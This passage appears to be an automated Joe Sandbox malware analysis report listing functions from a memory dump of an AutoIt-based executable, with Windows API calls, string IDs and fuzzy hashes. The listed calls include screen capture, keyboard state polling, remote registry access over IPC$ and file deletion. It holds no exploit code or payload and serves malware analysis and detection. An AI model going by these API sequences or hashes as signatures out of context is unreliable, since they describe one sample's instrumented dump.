                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2347767575-0
                                                                                                                                                        • Opcode ID: e18ff0b82a8b166ae0571e8511bd84b295573d9e4115fa38a0f7a38df085c729
                                                                                                                                                        • Instruction ID: c347d4fb0ad9dfbb0b30989e6cdef3da066a5412d7eda891ce061c47a64ec033
                                                                                                                                                        • Opcode Fuzzy Hash: e18ff0b82a8b166ae0571e8511bd84b295573d9e4115fa38a0f7a38df085c729
                                                                                                                                                        • Instruction Fuzzy Hash: D2515A75910209ABDF00DFA4DD8AEEEBB79FF48304F04816DE915A7290DB369A05CB60
                                                                                                                                                        APIs
                                                                                                                                                        • GetDC.USER32(00000000), ref: 00AEA2DD
                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00AEA2E9
                                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00AEA2F5
                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00AEA302
                                                                                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00AEA356
                                                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00AEA392
                                                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00AEA3B6
                                                                                                                                                        • SelectObject.GDI32(00000006,?), ref: 00AEA3BE
                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00AEA3C7
                                                                                                                                                        • DeleteDC.GDI32(00000006), ref: 00AEA3CE
                                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00AEA3D9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                        • String ID: (
                                                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                                                        • Opcode ID: ad1ed92b9dfcc09a0af2a9bb03b9137683d7c1e9139370bd35f16313596b6b77
                                                                                                                                                        • Instruction ID: 7e12eea70d29fb97d65d5db281b7e86ad47eacc99c0d873277a97bd39596812c
                                                                                                                                                        • Opcode Fuzzy Hash: ad1ed92b9dfcc09a0af2a9bb03b9137683d7c1e9139370bd35f16313596b6b77
                                                                                                                                                        • Instruction Fuzzy Hash: 63515875900349EFCB14CFA9DC85EAEBBB9EF48310F14881DF99AA7210C731A8418B60
                                                                                                                                                        APIs
                                                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF), ref: 00ADD567
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 00ADD589
                                                                                                                                                        • __swprintf.LIBCMT ref: 00ADD5DC
                                                                                                                                                        • _wprintf.LIBCMT ref: 00ADD68D
                                                                                                                                                        • _wprintf.LIBCMT ref: 00ADD6AB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                        • API String ID: 2116804098-2391861430
                                                                                                                                                        • Opcode ID: 730c47e96e7c36f03909fc25f54c9a4fb5f279cb9483a4697a159e29f128b509
                                                                                                                                                        • Instruction ID: dda19d6112b21521fc7f82f7aacf0bafb57a92d839e2f71a9cb652d75b911b17
                                                                                                                                                        • Opcode Fuzzy Hash: 730c47e96e7c36f03909fc25f54c9a4fb5f279cb9483a4697a159e29f128b509
                                                                                                                                                        • Instruction Fuzzy Hash: D0517172900209BACF15EBA0DE42EEEB7F9EF14700F104566F106B21A1EE715F58DBA1
                                                                                                                                                        APIs
                                                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00ADD37F
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00ADD3A0
                                                                                                                                                        • __swprintf.LIBCMT ref: 00ADD3F3
                                                                                                                                                        • _wprintf.LIBCMT ref: 00ADD499
                                                                                                                                                        • _wprintf.LIBCMT ref: 00ADD4B7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                        • API String ID: 2116804098-3420473620
                                                                                                                                                        • Opcode ID: 43a7f7490348d3311707482024b791e3514956d64fe848ba72e042f1f2886228
                                                                                                                                                        • Instruction ID: e10945958a5c033d93df6e23fe3460500822253ccd9abf0d78e6d167115b7650
                                                                                                                                                        • Opcode Fuzzy Hash: 43a7f7490348d3311707482024b791e3514956d64fe848ba72e042f1f2886228
                                                                                                                                                        • Instruction Fuzzy Hash: 4351A372900209AACF15EBA0DE42EEEB7B9EF14700F144466F106B21A1EB756F58DB61
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        • _memset.LIBCMT ref: 00ACAF74
                                                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00ACAFA9
                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00ACAFC5
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00ACAFE1
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00ACB00B
                                                                                                                                                        • CLSIDFromString.COMBASE(?,?), ref: 00ACB033
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00ACB03E
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00ACB043
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                        • API String ID: 1411258926-22481851
                                                                                                                                                        • Opcode ID: 0424787ad9abcb924b983a9b920578993e7eb123b53d20203f8fecd9f88853c1
                                                                                                                                                        • Instruction ID: 79b5bb438afeae8b7db167b757ccddfb2938232d928ef06d89bcf218343860c6
                                                                                                                                                        • Opcode Fuzzy Hash: 0424787ad9abcb924b983a9b920578993e7eb123b53d20203f8fecd9f88853c1
                                                                                                                                                        • Instruction Fuzzy Hash: 70410876D1022DAACF11EBA4DC95DEEB7B8BF18704F404069F901A3161EB719E04CFA1
                                                                                                                                                        APIs
                                                                                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharUpper
                                                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                        • API String ID: 3964851224-909552448
                                                                                                                                                        • Opcode ID: 9cc51fcab7b188cafa7fb9c18dd6cd4630f66ee2b1fff143a7473c64cf8ca281
                                                                                                                                                        • Instruction ID: 81a9eb2ce843a572122a4d8c78cc3da26f205848cc7d9217377255503f31d5a5
                                                                                                                                                        • Opcode Fuzzy Hash: 9cc51fcab7b188cafa7fb9c18dd6cd4630f66ee2b1fff143a7473c64cf8ca281
                                                                                                                                                        • Instruction Fuzzy Hash: B541913610024A8FCF08EF94D941BFA33A1BF2A390F1448A4FD515B295DB34DE2ADB60
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00AD843F
                                                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00AD8455
                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AD8466
                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AD8478
                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00AD8489
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: SendString$_memmove
                                                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                        • API String ID: 2279737902-1007645807
                                                                                                                                                        • Opcode ID: 95ebca3d4d7e4a3bbd0b953ceb88ff34e09664582731cb893748803de3051b0d
                                                                                                                                                        • Instruction ID: cd764edfa8497d3390b3e14e0bd3d1915423e1e98cf1413887df6dc20da8900e
                                                                                                                                                        • Opcode Fuzzy Hash: 95ebca3d4d7e4a3bbd0b953ceb88ff34e09664582731cb893748803de3051b0d
                                                                                                                                                        • Instruction Fuzzy Hash: 181194A1B5015979DB20A7A1DC4ADFF7BFCEF91F00F48046AB412A21D1DEA05F44C6B1
                                                                                                                                                        APIs
                                                                                                                                                        • timeGetTime.WINMM ref: 00AD809C
                                                                                                                                                          • Part of subcall function 00AAE3A5: timeGetTime.WINMM(?,7608B400,00B06163), ref: 00AAE3A9
                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00AD80C8
                                                                                                                                                        • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00AD80EC
                                                                                                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00AD810E
                                                                                                                                                        • SetActiveWindow.USER32 ref: 00AD812D
                                                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00AD813B
                                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00AD815A
                                                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 00AD8165
                                                                                                                                                        • IsWindow.USER32 ref: 00AD8171
                                                                                                                                                        • EndDialog.USER32(00000000), ref: 00AD8182
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                        • String ID: BUTTON
                                                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                                                        • Opcode ID: fcdecebcbc7157e7bfc9324b2072e0335d0be586c2e70fb68cfcd9793c6a2c2f
                                                                                                                                                        • Instruction ID: d186450afa2af3599369ab978ba659f2cd0e6d6af900476ff2265f6ad2a2e084
                                                                                                                                                        • Opcode Fuzzy Hash: fcdecebcbc7157e7bfc9324b2072e0335d0be586c2e70fb68cfcd9793c6a2c2f
                                                                                                                                                        • Instruction Fuzzy Hash: E721A170200305BFE7225B22EC89B763BAAF718BCAB444256F50283361CF764E099611
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B03C64,00000010,00000000,Bad directive syntax error,00B2DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00AD32D1
                                                                                                                                                        • LoadStringW.USER32(00000000,?,00B03C64,00000010), ref: 00AD32D8
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • _wprintf.LIBCMT ref: 00AD3309
                                                                                                                                                        • __swprintf.LIBCMT ref: 00AD332B
                                                                                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00AD3395
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                        • API String ID: 1506413516-4153970271
                                                                                                                                                        • Opcode ID: 6f97596e4f86cf303de41b82fd3549a8ead3f45b3b30dcab9e1e06aeb3f737d5
                                                                                                                                                        • Instruction ID: 61a47173e078c4005113035a9d2fecb1c52345f8c2aa1b70a38a889bb8ea060f
                                                                                                                                                        • Opcode Fuzzy Hash: 6f97596e4f86cf303de41b82fd3549a8ead3f45b3b30dcab9e1e06aeb3f737d5
                                                                                                                                                        • Instruction Fuzzy Hash: A9215132940219BBCF11EF90CD0AFEE77B9BF14700F044456F516A60A2DA75AB54DB51
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00ADC6A0: __time64.LIBCMT ref: 00ADC6AA
                                                                                                                                                          • Part of subcall function 00A941A7: _fseek.LIBCMT ref: 00A941BF
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00ADC96F
                                                                                                                                                          • Part of subcall function 00AB297D: __wsplitpath_helper.LIBCMT ref: 00AB29BD
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00ADC982
                                                                                                                                                        • _wcscat.LIBCMT ref: 00ADC995
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00ADC9BA
                                                                                                                                                        • _wcscat.LIBCMT ref: 00ADC9D0
                                                                                                                                                        • _wcscat.LIBCMT ref: 00ADC9E3
                                                                                                                                                          • Part of subcall function 00ADC6E4: _memmove.LIBCMT ref: 00ADC71D
                                                                                                                                                          • Part of subcall function 00ADC6E4: _memmove.LIBCMT ref: 00ADC72C
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ADC92A
                                                                                                                                                          • Part of subcall function 00ADCE59: _wcscmp.LIBCMT ref: 00ADCF49
                                                                                                                                                          • Part of subcall function 00ADCE59: _wcscmp.LIBCMT ref: 00ADCF5C
                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00ADCB8D
                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00ADCC24
                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00ADCC3A
                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ADCC4B
                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ADCC5D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 152968663-0
                                                                                                                                                        • Opcode ID: 0fc6b8c6db1cc19fc8b45d318bf65663a6e2c8c5555e06d388ae8356fe3363e2
                                                                                                                                                        • Instruction ID: 1e75282781049a24de0ec1ed4eaaf98ec508ebbb2d04b3c2e4c461187aa3c42f
                                                                                                                                                        • Opcode Fuzzy Hash: 0fc6b8c6db1cc19fc8b45d318bf65663a6e2c8c5555e06d388ae8356fe3363e2
                                                                                                                                                        • Instruction Fuzzy Hash: BCC13DB1A00129AECF10DFA5CD81EDEB7BDEF49310F5041AAF609E6251DB709A85CF61
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3566271842-0
                                                                                                                                                        • Opcode ID: 38f3f8a342483952efec80b81d1b1ff8ce3a13a8f0777eda142c58d74d865bfd
                                                                                                                                                        • Instruction ID: a7c406b7cc63a7b8252ae11aaa4cd71e0daa145d3ad6685034346d49f663c653
                                                                                                                                                        • Opcode Fuzzy Hash: 38f3f8a342483952efec80b81d1b1ff8ce3a13a8f0777eda142c58d74d865bfd
                                                                                                                                                        • Instruction Fuzzy Hash: 3C711D75A00219AFDB10DFA5C984EDEB7B9FF48350F048495E919AB252DB74EE40CF90
                                                                                                                                                        APIs
                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00AD3908
                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00AD3973
                                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00AD3993
                                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00AD39AA
                                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00AD39D9
                                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00AD39EA
                                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00AD3A16
                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 00AD3A24
                                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00AD3A4D
                                                                                                                                                        • GetKeyState.USER32(00000012), ref: 00AD3A5B
                                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00AD3A84
                                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00AD3A92
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                                        • Opcode ID: 63b7b0ddd85a5a95a4e80c76f03b394df152bb4c30314dd7dea18bac57ba9712
                                                                                                                                                        • Instruction ID: 3c3fdd19e3ae88a012e303b87e51ce094378375a641af77879ef4fe13904e072
                                                                                                                                                        • Opcode Fuzzy Hash: 63b7b0ddd85a5a95a4e80c76f03b394df152bb4c30314dd7dea18bac57ba9712
                                                                                                                                                        • Instruction Fuzzy Hash: 8051B562A0478429FF35EBA489117EEBBB45F01380F48859BD5C3562C2DAA49B8CC763
                                                                                                                                                        APIs
                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00ACFB19
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00ACFB2B
                                                                                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00ACFB89
                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00ACFB94
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00ACFBA6
                                                                                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00ACFBFC
                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00ACFC0A
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00ACFC1B
                                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00ACFC5E
                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00ACFC6C
                                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00ACFC89
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00ACFC96
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3096461208-0
                                                                                                                                                        • Opcode ID: 6b63100cc59268745834d93ee9fbb202fb1c2c5cffcf428f852ba944a044b262
                                                                                                                                                        • Instruction ID: 6fcf69bc7bd0e0dd8f97ca67333c733cd485e2b07de5f74ec0e9661f49b631ec
                                                                                                                                                        • Opcode Fuzzy Hash: 6b63100cc59268745834d93ee9fbb202fb1c2c5cffcf428f852ba944a044b262
                                                                                                                                                        • Instruction Fuzzy Hash: 2851FE71B00209AFDB18CF69DD95FAEBBBAEB88710F55813DB919D7294DB709D008B10
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAB155: GetWindowLongW.USER32(?,000000EB), ref: 00AAB166
                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00AAB067
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ColorLongWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 259745315-0
                                                                                                                                                        • Opcode ID: b4f4b6bf40a6c56e0b7f231c3bdee06a772b0bcddab49e1727c32cc87fd19141
                                                                                                                                                        • Instruction ID: a485e3a5f886ef23ec1acc4990d8f4fb4ead4cabeb5d046483aef30a7bf4c493
                                                                                                                                                        • Opcode Fuzzy Hash: b4f4b6bf40a6c56e0b7f231c3bdee06a772b0bcddab49e1727c32cc87fd19141
                                                                                                                                                        • Instruction Fuzzy Hash: 34418B31110540EFDB209F28D888BBA3BA6EB06721F5883A5FD759B1E6DB318C51DB31
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 136442275-0
                                                                                                                                                        • Opcode ID: 0bd2634d20cbe216c568df56b4f9526b55fb8a77f28eb727e6861d91c415e63b
